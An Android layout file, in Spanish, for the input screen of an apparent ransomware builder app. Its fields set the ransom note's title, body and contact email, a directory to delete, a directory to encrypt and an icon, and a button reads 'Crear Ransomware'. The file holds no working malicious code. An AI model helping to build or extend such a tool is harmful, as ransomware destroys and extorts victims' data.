<LinearLayout
	xmlns:android="http://schemas.android.com/apk/res/android"
	xmlns:app="http://schemas.android.com/apk/res-auto"
	xmlns:tools="http://schemas.android.com/tools"
	android:layout_width="match_parent"
	android:layout_height="match_parent"
	android:orientation="vertical">
	<LinearLayout
		android:id="@+id/linear1"
		android:layout_width="match_parent"
		android:layout_height="wrap_content"
		android:padding="8dp"
		android:orientation="horizontal"/>
	<ImageView
		android:id="@+id/imageview1"
		android:layout_width="wrap_content"
		android:layout_height="wrap_content"
		android:src="@drawable/viruscreator"
		android:scaleType="center"
		android:layout_gravity="center_horizontal"/>
	<LinearLayout
		android:id="@+id/linear2"
		android:layout_width="match_parent"
		android:layout_height="wrap_content"
		android:padding="8dp"
		android:orientation="horizontal"/>
	<EditText
		android:id="@+id/icono"
		android:layout_width="300dp"
		android:layout_height="wrap_content"
		android:padding="8dp"
		android:textSize="12sp"
		android:textColor="#000000"
		android:hint="Icono de el ransomware"
		android:textColorHint="#607D8B"
		android:layout_gravity="center_horizontal"/>
	<EditText
		android:id="@+id/asunto"
		android:layout_width="300dp"
		android:layout_height="wrap_content"
		android:padding="8dp"
		android:textSize="12sp"
		android:textColor="#000000"
		android:hint="Titulo del mensaje"
		android:textColorHint="#607D8B"
		android:layout_gravity="center_horizontal"/>
	<EditText
		android:id="@+id/cuerpo"
		android:layout_width="300dp"
		android:layout_height="wrap_content"
		android:padding="8dp"
		android:textSize="12sp"
		android:textColor="#000000"
		android:hint="Cuerpo del mensaje"
		android:textColorHint="#607D8B"
		android:layout_gravity="center_horizontal"/>
	<EditText
		android:id="@+id/email"
		android:layout_width="300dp"
		android:layout_height="wrap_content"
		android:padding="8dp"
		android:textSize="12sp"
		android:textColor="#000000"
		android:hint="Donde contactarte"
		android:textColorHint="#607D8B"
		android:layout_gravity="center_horizontal"/>
	<EditText
		android:id="@+id/ruta"
		android:layout_width="300dp"
		android:layout_height="wrap_content"
		android:padding="8dp"
		android:textSize="12sp"
		android:textColor="#000000"
		android:hint="Directorio a eliminar"
		android:textColorHint="#607D8B"
		android:layout_gravity="center_horizontal"/>
	<EditText
		android:id="@+id/encriptar"
		android:layout_width="300dp"
		android:layout_height="wrap_content"
		android:padding="8dp"
		android:textSize="12sp"
		android:textColor="#000000"
		android:hint="Directorio a encriptar"
		android:textColorHint="#607D8B"
		android:layout_gravity="center_horizontal"/>
	<EditText
		android:id="@+id/fondo"
		android:layout_width="300dp"
		android:layout_height="wrap_content"
		android:padding="8dp"
		android:textSize="12sp"
		android:textColor="#000000"
		android:hint="Fondo del ransomware"
		android:textColorHint="#607D8B"
		android:layout_gravity="center_horizontal"/>
	<LinearLayout
		android:id="@+id/linear3"
		android:layout_width="match_parent"
		android:layout_height="wrap_content"
		android:padding="8dp"
		android:orientation="horizontal"/>
	<Button
		android:id="@+id/button1"
		android:layout_width="300dp"
		android:layout_height="wrap_content"
		android:padding="8dp"
		android:text="Crear Ransomware"
		android:textSize="12sp"
		android:textColor="#000000"
		android:layout_gravity="center_horizontal"/>
</LinearLayout>
